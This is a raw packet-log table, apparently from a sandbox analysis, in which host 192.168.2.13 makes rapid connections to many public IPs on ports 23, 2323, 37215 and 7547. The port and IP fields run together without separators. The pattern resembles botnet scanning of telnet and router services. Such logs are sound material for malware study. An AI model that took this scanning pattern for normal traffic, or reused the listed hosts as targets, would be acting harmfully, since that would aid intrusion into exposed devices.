                                          Nov 7, 2024 11:57:58.395603895 CET233312140.123.119.148192.168.2.13
                                          Nov 7, 2024 11:57:58.395610094 CET3070437215192.168.2.1341.58.8.40
                                          Nov 7, 2024 11:57:58.395617008 CET3070437215192.168.2.1341.25.46.169
                                          Nov 7, 2024 11:57:58.395618916 CET3070437215192.168.2.1341.90.25.200
                                          Nov 7, 2024 11:57:58.395627975 CET3070437215192.168.2.1341.78.14.222
                                          Nov 7, 2024 11:57:58.395642042 CET3070437215192.168.2.1341.230.105.3
                                          Nov 7, 2024 11:57:58.395651102 CET331223192.168.2.13140.123.119.148
                                          Nov 7, 2024 11:57:58.395652056 CET3070437215192.168.2.1341.15.79.26
                                          Nov 7, 2024 11:57:58.395652056 CET3070437215192.168.2.1341.137.65.115
                                          Nov 7, 2024 11:57:58.395664930 CET3070437215192.168.2.1341.190.218.90
                                          Nov 7, 2024 11:57:58.395668983 CET23331296.122.104.194192.168.2.13
                                          Nov 7, 2024 11:57:58.395673037 CET3070437215192.168.2.1341.175.238.180
                                          Nov 7, 2024 11:57:58.395673037 CET3070437215192.168.2.1341.235.8.81
                                          Nov 7, 2024 11:57:58.395683050 CET23331239.126.134.255192.168.2.13
                                          Nov 7, 2024 11:57:58.395684958 CET3070437215192.168.2.1341.49.250.177
                                          Nov 7, 2024 11:57:58.395695925 CET233312140.222.177.171192.168.2.13
                                          Nov 7, 2024 11:57:58.395701885 CET3070437215192.168.2.1341.40.85.98
                                          Nov 7, 2024 11:57:58.395708084 CET331223192.168.2.1396.122.104.194
                                          Nov 7, 2024 11:57:58.395709038 CET233312208.225.197.41192.168.2.13
                                          Nov 7, 2024 11:57:58.395709991 CET3070437215192.168.2.1341.41.71.21
                                          Nov 7, 2024 11:57:58.395719051 CET331223192.168.2.1339.126.134.255
                                          Nov 7, 2024 11:57:58.395721912 CET233312222.234.26.51192.168.2.13
                                          Nov 7, 2024 11:57:58.395725965 CET3070437215192.168.2.1341.226.23.132
                                          Nov 7, 2024 11:57:58.395728111 CET3070437215192.168.2.1341.66.236.83
                                          Nov 7, 2024 11:57:58.395735025 CET23233312160.119.41.32192.168.2.13
                                          Nov 7, 2024 11:57:58.395735025 CET3070437215192.168.2.1341.50.79.165
                                          Nov 7, 2024 11:57:58.395735025 CET331223192.168.2.13140.222.177.171
                                          Nov 7, 2024 11:57:58.395735979 CET331223192.168.2.13208.225.197.41
                                          Nov 7, 2024 11:57:58.395742893 CET3070437215192.168.2.1341.222.141.183
                                          Nov 7, 2024 11:57:58.395745993 CET3070437215192.168.2.1341.69.186.247
                                          Nov 7, 2024 11:57:58.395750999 CET233312219.252.233.75192.168.2.13
                                          Nov 7, 2024 11:57:58.395756006 CET233312203.168.134.90192.168.2.13
                                          Nov 7, 2024 11:57:58.395761013 CET233312212.29.234.147192.168.2.13
                                          Nov 7, 2024 11:57:58.395772934 CET233312163.239.11.206192.168.2.13
                                          Nov 7, 2024 11:57:58.395778894 CET3070437215192.168.2.1341.61.59.198
                                          Nov 7, 2024 11:57:58.395782948 CET3070437215192.168.2.1341.171.247.177
                                          Nov 7, 2024 11:57:58.395785093 CET3070437215192.168.2.1341.131.185.38
                                          Nov 7, 2024 11:57:58.395786047 CET233312200.80.114.98192.168.2.13
                                          Nov 7, 2024 11:57:58.395785093 CET3070437215192.168.2.1341.181.177.18
                                          Nov 7, 2024 11:57:58.395790100 CET3070437215192.168.2.1341.20.194.0
                                          Nov 7, 2024 11:57:58.395792961 CET33122323192.168.2.13160.119.41.32
                                          Nov 7, 2024 11:57:58.395792961 CET331223192.168.2.13222.234.26.51
                                          Nov 7, 2024 11:57:58.395797968 CET331223192.168.2.13219.252.233.75
                                          Nov 7, 2024 11:57:58.395797968 CET331223192.168.2.13212.29.234.147
                                          Nov 7, 2024 11:57:58.395798922 CET233312130.179.92.147192.168.2.13
                                          Nov 7, 2024 11:57:58.395823002 CET233312137.135.163.109192.168.2.13
                                          Nov 7, 2024 11:57:58.395828009 CET331223192.168.2.13200.80.114.98
                                          Nov 7, 2024 11:57:58.395828009 CET3070437215192.168.2.1341.161.90.72
                                          Nov 7, 2024 11:57:58.395828962 CET331223192.168.2.13203.168.134.90
                                          Nov 7, 2024 11:57:58.395829916 CET331223192.168.2.13163.239.11.206
                                          Nov 7, 2024 11:57:58.395829916 CET331223192.168.2.13130.179.92.147
                                          Nov 7, 2024 11:57:58.395836115 CET23331237.94.103.123192.168.2.13
                                          Nov 7, 2024 11:57:58.395849943 CET233312186.34.188.19192.168.2.13
                                          Nov 7, 2024 11:57:58.395852089 CET331223192.168.2.13137.135.163.109
                                          Nov 7, 2024 11:57:58.395855904 CET3070437215192.168.2.1341.80.217.239
                                          Nov 7, 2024 11:57:58.395860910 CET3070437215192.168.2.1341.2.207.214
                                          Nov 7, 2024 11:57:58.395860910 CET3070437215192.168.2.1341.251.54.85
                                          Nov 7, 2024 11:57:58.395863056 CET23233312149.104.86.28192.168.2.13
                                          Nov 7, 2024 11:57:58.395874977 CET331223192.168.2.1337.94.103.123
                                          Nov 7, 2024 11:57:58.395875931 CET233312132.122.72.104192.168.2.13
                                          Nov 7, 2024 11:57:58.395878077 CET331223192.168.2.13186.34.188.19
                                          Nov 7, 2024 11:57:58.395889044 CET23331213.42.219.214192.168.2.13
                                          Nov 7, 2024 11:57:58.395894051 CET3070437215192.168.2.1341.33.141.143
                                          Nov 7, 2024 11:57:58.395896912 CET33122323192.168.2.13149.104.86.28
                                          Nov 7, 2024 11:57:58.395896912 CET3070437215192.168.2.1341.177.14.87
                                          Nov 7, 2024 11:57:58.395901918 CET233312148.114.48.8192.168.2.13
                                          Nov 7, 2024 11:57:58.395901918 CET331223192.168.2.13132.122.72.104
                                          Nov 7, 2024 11:57:58.395912886 CET3070437215192.168.2.1341.15.214.88
                                          Nov 7, 2024 11:57:58.395912886 CET3070437215192.168.2.1341.224.130.236
                                          Nov 7, 2024 11:57:58.395915985 CET233312111.46.183.165192.168.2.13
                                          Nov 7, 2024 11:57:58.395926952 CET3070437215192.168.2.1341.34.69.32
                                          Nov 7, 2024 11:57:58.395927906 CET233312166.184.82.114192.168.2.13
                                          Nov 7, 2024 11:57:58.395934105 CET331223192.168.2.1313.42.219.214
                                          Nov 7, 2024 11:57:58.395934105 CET331223192.168.2.13148.114.48.8
                                          Nov 7, 2024 11:57:58.395941973 CET23331294.123.217.58192.168.2.13
                                          Nov 7, 2024 11:57:58.395944118 CET3070437215192.168.2.1341.95.81.16
                                          Nov 7, 2024 11:57:58.395944118 CET331223192.168.2.13111.46.183.165
                                          Nov 7, 2024 11:57:58.395951033 CET3070437215192.168.2.1341.58.10.244
                                          Nov 7, 2024 11:57:58.395951033 CET3070437215192.168.2.1341.226.127.219
                                          Nov 7, 2024 11:57:58.395955086 CET233312218.58.54.167192.168.2.13
                                          Nov 7, 2024 11:57:58.395956993 CET3070437215192.168.2.1341.231.13.13
                                          Nov 7, 2024 11:57:58.395956993 CET331223192.168.2.13166.184.82.114
                                          Nov 7, 2024 11:57:58.395965099 CET3070437215192.168.2.1341.106.136.15
                                          Nov 7, 2024 11:57:58.395972013 CET331223192.168.2.1394.123.217.58
                                          Nov 7, 2024 11:57:58.395994902 CET331223192.168.2.13218.58.54.167
                                          Nov 7, 2024 11:57:58.396003962 CET3070437215192.168.2.1341.194.68.121
                                          Nov 7, 2024 11:57:58.396012068 CET3070437215192.168.2.1341.176.243.34
                                          Nov 7, 2024 11:57:58.396018028 CET3070437215192.168.2.1341.168.52.212
                                          Nov 7, 2024 11:57:58.396022081 CET3070437215192.168.2.1341.123.116.2
                                          Nov 7, 2024 11:57:58.396032095 CET3070437215192.168.2.1341.240.1.29
                                          Nov 7, 2024 11:57:58.396044970 CET3070437215192.168.2.1341.102.180.221
                                          Nov 7, 2024 11:57:58.396044970 CET3070437215192.168.2.1341.119.167.135
                                          Nov 7, 2024 11:57:58.396055937 CET3070437215192.168.2.1341.32.98.123
                                          Nov 7, 2024 11:57:58.396059990 CET3070437215192.168.2.1341.80.34.222
                                          Nov 7, 2024 11:57:58.396075010 CET3070437215192.168.2.1341.228.231.125
                                          Nov 7, 2024 11:57:58.396085024 CET3070437215192.168.2.1341.132.100.234
                                          Nov 7, 2024 11:57:58.396087885 CET3070437215192.168.2.1341.145.206.67
                                          Nov 7, 2024 11:57:58.396095991 CET3070437215192.168.2.1341.12.194.225
                                          Nov 7, 2024 11:57:58.396099091 CET3070437215192.168.2.1341.68.23.45
                                          Nov 7, 2024 11:57:58.396105051 CET3070437215192.168.2.1341.165.42.122
                                          Nov 7, 2024 11:57:58.396111965 CET3070437215192.168.2.1341.156.223.211
                                          Nov 7, 2024 11:57:58.396119118 CET3070437215192.168.2.1341.12.230.102
                                          Nov 7, 2024 11:57:58.396123886 CET3070437215192.168.2.1341.66.140.246
                                          Nov 7, 2024 11:57:58.396135092 CET3070437215192.168.2.1341.66.151.161
                                          Nov 7, 2024 11:57:58.396142960 CET3070437215192.168.2.1341.107.40.48
                                          Nov 7, 2024 11:57:58.396153927 CET3070437215192.168.2.1341.187.141.232
                                          Nov 7, 2024 11:57:58.396155119 CET3070437215192.168.2.1341.0.65.49
                                          Nov 7, 2024 11:57:58.396172047 CET3070437215192.168.2.1341.157.249.192
                                          Nov 7, 2024 11:57:58.396174908 CET3070437215192.168.2.1341.40.72.133
                                          Nov 7, 2024 11:57:58.396174908 CET3070437215192.168.2.1341.230.106.190
                                          Nov 7, 2024 11:57:58.396177053 CET233312166.231.212.186192.168.2.13
                                          Nov 7, 2024 11:57:58.396190882 CET233312156.169.254.98192.168.2.13
                                          Nov 7, 2024 11:57:58.396193027 CET3070437215192.168.2.1341.178.182.148
                                          Nov 7, 2024 11:57:58.396193027 CET3070437215192.168.2.1341.143.126.0
                                          Nov 7, 2024 11:57:58.396202087 CET23331241.80.100.7192.168.2.13
                                          Nov 7, 2024 11:57:58.396212101 CET331223192.168.2.13166.231.212.186
                                          Nov 7, 2024 11:57:58.396212101 CET2323331262.9.17.161192.168.2.13
                                          Nov 7, 2024 11:57:58.396214008 CET331223192.168.2.13156.169.254.98
                                          Nov 7, 2024 11:57:58.396225929 CET3070437215192.168.2.1341.35.227.120
                                          Nov 7, 2024 11:57:58.396235943 CET331223192.168.2.1341.80.100.7
                                          Nov 7, 2024 11:57:58.396235943 CET33122323192.168.2.1362.9.17.161
                                          Nov 7, 2024 11:57:58.396236897 CET3070437215192.168.2.1341.106.221.100
                                          Nov 7, 2024 11:57:58.396239996 CET23331220.34.176.29192.168.2.13
                                          Nov 7, 2024 11:57:58.396254063 CET3070437215192.168.2.1341.77.77.235
                                          Nov 7, 2024 11:57:58.396254063 CET23331266.152.197.165192.168.2.13
                                          Nov 7, 2024 11:57:58.396254063 CET3070437215192.168.2.1341.101.107.197
                                          Nov 7, 2024 11:57:58.396261930 CET3070437215192.168.2.1341.148.42.163
                                          Nov 7, 2024 11:57:58.396270037 CET233312190.156.246.135192.168.2.13
                                          Nov 7, 2024 11:57:58.396274090 CET331223192.168.2.1320.34.176.29
                                          Nov 7, 2024 11:57:58.396275043 CET3070437215192.168.2.1341.19.196.173
                                          Nov 7, 2024 11:57:58.396282911 CET23331223.49.239.94192.168.2.13
                                          Nov 7, 2024 11:57:58.396284103 CET331223192.168.2.1366.152.197.165
                                          Nov 7, 2024 11:57:58.396291971 CET3070437215192.168.2.1341.124.118.217
                                          Nov 7, 2024 11:57:58.396295071 CET3070437215192.168.2.1341.146.58.228
                                          Nov 7, 2024 11:57:58.396296978 CET233312108.82.161.35192.168.2.13
                                          Nov 7, 2024 11:57:58.396300077 CET3070437215192.168.2.1341.107.226.53
                                          Nov 7, 2024 11:57:58.396306038 CET331223192.168.2.13190.156.246.135
                                          Nov 7, 2024 11:57:58.396308899 CET331223192.168.2.1323.49.239.94
                                          Nov 7, 2024 11:57:58.396310091 CET23331291.240.139.180192.168.2.13
                                          Nov 7, 2024 11:57:58.396323919 CET233312158.20.153.133192.168.2.13
                                          Nov 7, 2024 11:57:58.396323919 CET3070437215192.168.2.1341.25.210.44
                                          Nov 7, 2024 11:57:58.396327019 CET331223192.168.2.13108.82.161.35
                                          Nov 7, 2024 11:57:58.396333933 CET3070437215192.168.2.1341.226.186.72
                                          Nov 7, 2024 11:57:58.396333933 CET3070437215192.168.2.1341.194.149.4
                                          Nov 7, 2024 11:57:58.396334887 CET3070437215192.168.2.1341.14.241.128
                                          Nov 7, 2024 11:57:58.396342039 CET331223192.168.2.1391.240.139.180
                                          Nov 7, 2024 11:57:58.396348000 CET233312176.119.8.245192.168.2.13
                                          Nov 7, 2024 11:57:58.396356106 CET331223192.168.2.13158.20.153.133
                                          Nov 7, 2024 11:57:58.396361113 CET233312200.53.9.66192.168.2.13
                                          Nov 7, 2024 11:57:58.396368027 CET3070437215192.168.2.1341.201.147.78
                                          Nov 7, 2024 11:57:58.396367073 CET3070437215192.168.2.1341.254.151.39
                                          Nov 7, 2024 11:57:58.396374941 CET23233312162.144.157.205192.168.2.13
                                          Nov 7, 2024 11:57:58.396377087 CET331223192.168.2.13176.119.8.245
                                          Nov 7, 2024 11:57:58.396379948 CET3070437215192.168.2.1341.209.116.249
                                          Nov 7, 2024 11:57:58.396389008 CET23331282.102.60.160192.168.2.13
                                          Nov 7, 2024 11:57:58.396395922 CET331223192.168.2.13200.53.9.66
                                          Nov 7, 2024 11:57:58.396401882 CET233312180.98.171.230192.168.2.13
                                          Nov 7, 2024 11:57:58.396411896 CET33122323192.168.2.13162.144.157.205
                                          Nov 7, 2024 11:57:58.396413088 CET3070437215192.168.2.1341.139.54.22
                                          Nov 7, 2024 11:57:58.396414995 CET23331243.228.76.248192.168.2.13
                                          Nov 7, 2024 11:57:58.396416903 CET331223192.168.2.1382.102.60.160
                                          Nov 7, 2024 11:57:58.396423101 CET3070437215192.168.2.1341.58.87.211
                                          Nov 7, 2024 11:57:58.396426916 CET3070437215192.168.2.1341.252.236.126
                                          Nov 7, 2024 11:57:58.396426916 CET3070437215192.168.2.1341.13.4.72
                                          Nov 7, 2024 11:57:58.396429062 CET233312140.10.186.245192.168.2.13
                                          Nov 7, 2024 11:57:58.396430969 CET3070437215192.168.2.1341.240.98.125
                                          Nov 7, 2024 11:57:58.396436930 CET3070437215192.168.2.1341.84.246.179
                                          Nov 7, 2024 11:57:58.396440029 CET331223192.168.2.13180.98.171.230
                                          Nov 7, 2024 11:57:58.396440983 CET23331279.33.66.94192.168.2.13
                                          Nov 7, 2024 11:57:58.396446943 CET3070437215192.168.2.1341.9.100.211
                                          Nov 7, 2024 11:57:58.396450043 CET331223192.168.2.1343.228.76.248
                                          Nov 7, 2024 11:57:58.396456003 CET2323331285.20.22.132192.168.2.13
                                          Nov 7, 2024 11:57:58.396456003 CET331223192.168.2.13140.10.186.245
                                          Nov 7, 2024 11:57:58.396465063 CET3070437215192.168.2.1341.175.190.193
                                          Nov 7, 2024 11:57:58.396466970 CET331223192.168.2.1379.33.66.94
                                          Nov 7, 2024 11:57:58.396470070 CET233312102.68.197.1192.168.2.13
                                          Nov 7, 2024 11:57:58.396472931 CET3070437215192.168.2.1341.100.50.240
                                          Nov 7, 2024 11:57:58.396478891 CET3070437215192.168.2.1341.155.142.112
                                          Nov 7, 2024 11:57:58.396480083 CET33122323192.168.2.1385.20.22.132
                                          Nov 7, 2024 11:57:58.396492958 CET233312101.161.93.8192.168.2.13
                                          Nov 7, 2024 11:57:58.396502018 CET331223192.168.2.13102.68.197.1
                                          Nov 7, 2024 11:57:58.396506071 CET3070437215192.168.2.1341.248.48.101
                                          Nov 7, 2024 11:57:58.396506071 CET233312105.248.177.136192.168.2.13
                                          Nov 7, 2024 11:57:58.396517992 CET233312162.229.126.224192.168.2.13
                                          Nov 7, 2024 11:57:58.396519899 CET331223192.168.2.13101.161.93.8
                                          Nov 7, 2024 11:57:58.396532059 CET233312203.163.21.113192.168.2.13
                                          Nov 7, 2024 11:57:58.396539927 CET331223192.168.2.13105.248.177.136
                                          Nov 7, 2024 11:57:58.396543980 CET23331268.228.161.53192.168.2.13
                                          Nov 7, 2024 11:57:58.396558046 CET23331263.88.154.167192.168.2.13
                                          Nov 7, 2024 11:57:58.396564960 CET331223192.168.2.13203.163.21.113
                                          Nov 7, 2024 11:57:58.396572113 CET3070437215192.168.2.1341.85.44.225
                                          Nov 7, 2024 11:57:58.396572113 CET331223192.168.2.1368.228.161.53
                                          Nov 7, 2024 11:57:58.396576881 CET331223192.168.2.13162.229.126.224
                                          Nov 7, 2024 11:57:58.396578074 CET3070437215192.168.2.1341.156.0.19
                                          Nov 7, 2024 11:57:58.396578074 CET233312124.195.117.4192.168.2.13
                                          Nov 7, 2024 11:57:58.396586895 CET331223192.168.2.1363.88.154.167
                                          Nov 7, 2024 11:57:58.396589994 CET3070437215192.168.2.1341.30.137.171
                                          Nov 7, 2024 11:57:58.396590948 CET23331246.110.190.173192.168.2.13
                                          Nov 7, 2024 11:57:58.396599054 CET3070437215192.168.2.1341.101.31.204
                                          Nov 7, 2024 11:57:58.396604061 CET233312152.79.53.83192.168.2.13
                                          Nov 7, 2024 11:57:58.396615028 CET331223192.168.2.13124.195.117.4
                                          Nov 7, 2024 11:57:58.396621943 CET3070437215192.168.2.1341.16.7.94
                                          Nov 7, 2024 11:57:58.396636009 CET331223192.168.2.1346.110.190.173
                                          Nov 7, 2024 11:57:58.396636009 CET3070437215192.168.2.1341.174.227.248
                                          Nov 7, 2024 11:57:58.396639109 CET3070437215192.168.2.1341.169.204.194
                                          Nov 7, 2024 11:57:58.396639109 CET331223192.168.2.13152.79.53.83
                                          Nov 7, 2024 11:57:58.396651030 CET3070437215192.168.2.1341.149.114.171
                                          Nov 7, 2024 11:57:58.396656036 CET3070437215192.168.2.1341.77.101.214
                                          Nov 7, 2024 11:57:58.396667004 CET3070437215192.168.2.1341.118.78.250
                                          Nov 7, 2024 11:57:58.396667004 CET3070437215192.168.2.1341.4.50.80
                                          Nov 7, 2024 11:57:58.396682024 CET3070437215192.168.2.1341.124.177.36
                                          Nov 7, 2024 11:57:58.396689892 CET3070437215192.168.2.1341.221.190.20
                                          Nov 7, 2024 11:57:58.396698952 CET3070437215192.168.2.1341.209.10.90
                                          Nov 7, 2024 11:57:58.396698952 CET3070437215192.168.2.1341.157.82.6
                                          Nov 7, 2024 11:57:58.396703959 CET3070437215192.168.2.1341.83.58.37
                                          Nov 7, 2024 11:57:58.396727085 CET3070437215192.168.2.1341.73.53.221
                                          Nov 7, 2024 11:57:58.396727085 CET3070437215192.168.2.1341.134.94.156
                                          Nov 7, 2024 11:57:58.396737099 CET3070437215192.168.2.1341.104.32.225
                                          Nov 7, 2024 11:57:58.396737099 CET3070437215192.168.2.1341.62.33.227
                                          Nov 7, 2024 11:57:58.396747112 CET3070437215192.168.2.1341.142.87.144
                                          Nov 7, 2024 11:57:58.396747112 CET3070437215192.168.2.1341.48.45.207
                                          Nov 7, 2024 11:57:58.396748066 CET3070437215192.168.2.1341.130.136.91
                                          Nov 7, 2024 11:57:58.396749020 CET3070437215192.168.2.1341.212.205.143
                                          Nov 7, 2024 11:57:58.396758080 CET3070437215192.168.2.1341.215.243.15
                                          Nov 7, 2024 11:57:58.396761894 CET3070437215192.168.2.1341.124.86.223
                                          Nov 7, 2024 11:57:58.396764994 CET3070437215192.168.2.1341.66.200.22
                                          Nov 7, 2024 11:57:58.396781921 CET3070437215192.168.2.1341.168.2.91
                                          Nov 7, 2024 11:57:58.396789074 CET3070437215192.168.2.1341.75.97.219
                                          Nov 7, 2024 11:57:58.396790028 CET3070437215192.168.2.1341.15.128.242
                                          Nov 7, 2024 11:57:58.396799088 CET233312134.136.170.6192.168.2.13
                                          Nov 7, 2024 11:57:58.396802902 CET3070437215192.168.2.1341.54.188.29
                                          Nov 7, 2024 11:57:58.396809101 CET3070437215192.168.2.1341.145.86.147
                                          Nov 7, 2024 11:57:58.396814108 CET3070437215192.168.2.1341.130.182.130
                                          Nov 7, 2024 11:57:58.396815062 CET233312113.188.89.219192.168.2.13
                                          Nov 7, 2024 11:57:58.396816015 CET3070437215192.168.2.1341.135.243.175
                                          Nov 7, 2024 11:57:58.396816015 CET3070437215192.168.2.1341.22.156.48
                                          Nov 7, 2024 11:57:58.396827936 CET23331243.92.156.11192.168.2.13
                                          Nov 7, 2024 11:57:58.396831036 CET3070437215192.168.2.1341.157.213.174
                                          Nov 7, 2024 11:57:58.396832943 CET3070437215192.168.2.1341.46.216.80
                                          Nov 7, 2024 11:57:58.396832943 CET3070437215192.168.2.1341.172.136.172
                                          Nov 7, 2024 11:57:58.396836996 CET331223192.168.2.13134.136.170.6
                                          Nov 7, 2024 11:57:58.396842003 CET75473056168.30.180.55192.168.2.13
                                          Nov 7, 2024 11:57:58.396845102 CET3070437215192.168.2.1341.200.83.34
                                          Nov 7, 2024 11:57:58.396850109 CET331223192.168.2.13113.188.89.219
                                          Nov 7, 2024 11:57:58.396855116 CET75473056198.219.183.55192.168.2.13
                                          Nov 7, 2024 11:57:58.396856070 CET3070437215192.168.2.1341.130.59.87
                                          Nov 7, 2024 11:57:58.396864891 CET331223192.168.2.1343.92.156.11
                                          Nov 7, 2024 11:57:58.396867990 CET75473056165.239.16.148192.168.2.13
                                          Nov 7, 2024 11:57:58.396871090 CET3070437215192.168.2.1341.140.159.145
                                          Nov 7, 2024 11:57:58.396872997 CET3070437215192.168.2.1341.33.183.22
                                          Nov 7, 2024 11:57:58.396872997 CET30567547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:58.396873951 CET3070437215192.168.2.1341.4.230.102
                                          Nov 7, 2024 11:57:58.396872997 CET3070437215192.168.2.1341.201.184.142
                                          Nov 7, 2024 11:57:58.396881104 CET3070437215192.168.2.1341.244.228.225
                                          Nov 7, 2024 11:57:58.396888018 CET75473056203.84.99.53192.168.2.13
                                          Nov 7, 2024 11:57:58.396893024 CET30567547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:58.396893024 CET30567547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:58.396900892 CET7547305645.38.44.1192.168.2.13
                                          Nov 7, 2024 11:57:58.396904945 CET3070437215192.168.2.1341.242.244.50
                                          Nov 7, 2024 11:57:58.396914005 CET75473056173.66.213.27192.168.2.13
                                          Nov 7, 2024 11:57:58.396915913 CET3070437215192.168.2.1341.8.98.171
                                          Nov 7, 2024 11:57:58.396918058 CET30567547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:58.396923065 CET30567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:58.396927118 CET75473056178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:58.396934032 CET3070437215192.168.2.1341.129.78.76
                                          Nov 7, 2024 11:57:58.396939039 CET75473056218.4.9.0192.168.2.13
                                          Nov 7, 2024 11:57:58.396944046 CET30567547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:58.396951914 CET75473056164.23.110.18192.168.2.13
                                          Nov 7, 2024 11:57:58.396951914 CET30567547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:58.396965027 CET75473056161.120.27.203192.168.2.13
                                          Nov 7, 2024 11:57:58.396970034 CET3070437215192.168.2.1341.19.181.149
                                          Nov 7, 2024 11:57:58.396970987 CET3070437215192.168.2.1341.134.209.86
                                          Nov 7, 2024 11:57:58.396971941 CET3070437215192.168.2.1341.63.29.14
                                          Nov 7, 2024 11:57:58.396974087 CET30567547192.168.2.13218.4.9.0
                                          Nov 7, 2024 11:57:58.396974087 CET3070437215192.168.2.1341.199.170.166
                                          Nov 7, 2024 11:57:58.396979094 CET7547305695.245.103.118192.168.2.13
                                          Nov 7, 2024 11:57:58.396986961 CET30567547192.168.2.13164.23.110.18
                                          Nov 7, 2024 11:57:58.396986961 CET3070437215192.168.2.1341.61.208.74
                                          Nov 7, 2024 11:57:58.396995068 CET3070437215192.168.2.1341.140.234.87
                                          Nov 7, 2024 11:57:58.396996021 CET7547305658.52.165.16192.168.2.13
                                          Nov 7, 2024 11:57:58.396995068 CET30567547192.168.2.13161.120.27.203
                                          Nov 7, 2024 11:57:58.397012949 CET30567547192.168.2.1395.245.103.118
                                          Nov 7, 2024 11:57:58.397022963 CET75473056144.24.215.144192.168.2.13
                                          Nov 7, 2024 11:57:58.397023916 CET3070437215192.168.2.1341.1.229.181
                                          Nov 7, 2024 11:57:58.397027016 CET30567547192.168.2.1358.52.165.16
                                          Nov 7, 2024 11:57:58.397033930 CET3070437215192.168.2.1341.144.172.64
                                          Nov 7, 2024 11:57:58.397037029 CET75473056145.65.108.245192.168.2.13
                                          Nov 7, 2024 11:57:58.397046089 CET3070437215192.168.2.1341.195.218.74
                                          Nov 7, 2024 11:57:58.397047997 CET3070437215192.168.2.1341.81.174.107
                                          Nov 7, 2024 11:57:58.397052050 CET754730565.8.101.228192.168.2.13
                                          Nov 7, 2024 11:57:58.397061110 CET3070437215192.168.2.1341.223.88.14
                                          Nov 7, 2024 11:57:58.397061110 CET30567547192.168.2.13144.24.215.144
                                          Nov 7, 2024 11:57:58.397062063 CET3070437215192.168.2.1341.239.155.35
                                          Nov 7, 2024 11:57:58.397066116 CET75473056207.86.105.37192.168.2.13
                                          Nov 7, 2024 11:57:58.397075891 CET30567547192.168.2.13145.65.108.245
                                          Nov 7, 2024 11:57:58.397078037 CET30567547192.168.2.135.8.101.228
                                          Nov 7, 2024 11:57:58.397078991 CET75473056102.191.171.160192.168.2.13
                                          Nov 7, 2024 11:57:58.397082090 CET3070437215192.168.2.1341.179.210.25
                                          Nov 7, 2024 11:57:58.397089958 CET3070437215192.168.2.1341.157.34.223
                                          Nov 7, 2024 11:57:58.397092104 CET7547305678.190.240.127192.168.2.13
                                          Nov 7, 2024 11:57:58.397094011 CET30567547192.168.2.13207.86.105.37
                                          Nov 7, 2024 11:57:58.397104979 CET7547305620.208.34.62192.168.2.13
                                          Nov 7, 2024 11:57:58.397104979 CET30567547192.168.2.13102.191.171.160
                                          Nov 7, 2024 11:57:58.397113085 CET3070437215192.168.2.1341.255.155.153
                                          Nov 7, 2024 11:57:58.397119999 CET75473056156.78.209.36192.168.2.13
                                          Nov 7, 2024 11:57:58.397129059 CET30567547192.168.2.1378.190.240.127
                                          Nov 7, 2024 11:57:58.397130013 CET30567547192.168.2.1320.208.34.62
                                          Nov 7, 2024 11:57:58.397133112 CET7547305666.163.163.254192.168.2.13
                                          Nov 7, 2024 11:57:58.397146940 CET75473056197.131.140.8192.168.2.13
                                          Nov 7, 2024 11:57:58.397146940 CET3070437215192.168.2.1341.158.81.55
                                          Nov 7, 2024 11:57:58.397146940 CET30567547192.168.2.13156.78.209.36
                                          Nov 7, 2024 11:57:58.397160053 CET7547305695.178.151.109192.168.2.13
                                          Nov 7, 2024 11:57:58.397166014 CET30567547192.168.2.1366.163.163.254
                                          Nov 7, 2024 11:57:58.397166014 CET3070437215192.168.2.1341.163.52.139
                                          Nov 7, 2024 11:57:58.397169113 CET3070437215192.168.2.1341.7.52.80
                                          Nov 7, 2024 11:57:58.397172928 CET30567547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:57:58.397173882 CET754730564.230.209.133192.168.2.13
                                          Nov 7, 2024 11:57:58.397186041 CET3070437215192.168.2.1341.99.145.52
                                          Nov 7, 2024 11:57:58.397186995 CET75473056201.250.120.24192.168.2.13
                                          Nov 7, 2024 11:57:58.397190094 CET30567547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:58.397201061 CET75473056217.144.32.43192.168.2.13
                                          Nov 7, 2024 11:57:58.397207975 CET30567547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:58.397213936 CET7547305634.183.63.81192.168.2.13
                                          Nov 7, 2024 11:57:58.397222042 CET3070437215192.168.2.1341.163.118.122
                                          Nov 7, 2024 11:57:58.397226095 CET75473056167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:57:58.397227049 CET30567547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:58.397231102 CET30567547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:58.397238016 CET75473056182.58.1.242192.168.2.13
                                          Nov 7, 2024 11:57:58.397238970 CET30567547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:58.397245884 CET3070437215192.168.2.1341.229.169.119
                                          Nov 7, 2024 11:57:58.397248983 CET75473056219.44.145.4192.168.2.13
                                          Nov 7, 2024 11:57:58.397257090 CET30567547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:57:58.397267103 CET3070437215192.168.2.1341.90.87.71
                                          Nov 7, 2024 11:57:58.397273064 CET30567547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:57:58.397275925 CET3070437215192.168.2.1341.179.178.126
                                          Nov 7, 2024 11:57:58.397281885 CET30567547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:57:58.397284031 CET75473056128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:57:58.397293091 CET3070437215192.168.2.1341.155.133.85
                                          Nov 7, 2024 11:57:58.397296906 CET3070437215192.168.2.1341.230.73.160
                                          Nov 7, 2024 11:57:58.397296906 CET75473056194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:57:58.397298098 CET3070437215192.168.2.1341.83.28.76
                                          Nov 7, 2024 11:57:58.397313118 CET75473056199.58.155.75192.168.2.13
                                          Nov 7, 2024 11:57:58.397314072 CET3070437215192.168.2.1341.44.9.27
                                          Nov 7, 2024 11:57:58.397315025 CET30567547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:57:58.397325993 CET75473056167.210.14.28192.168.2.13
                                          Nov 7, 2024 11:57:58.397326946 CET3070437215192.168.2.1341.148.47.233
                                          Nov 7, 2024 11:57:58.397331953 CET30567547192.168.2.13194.122.191.22
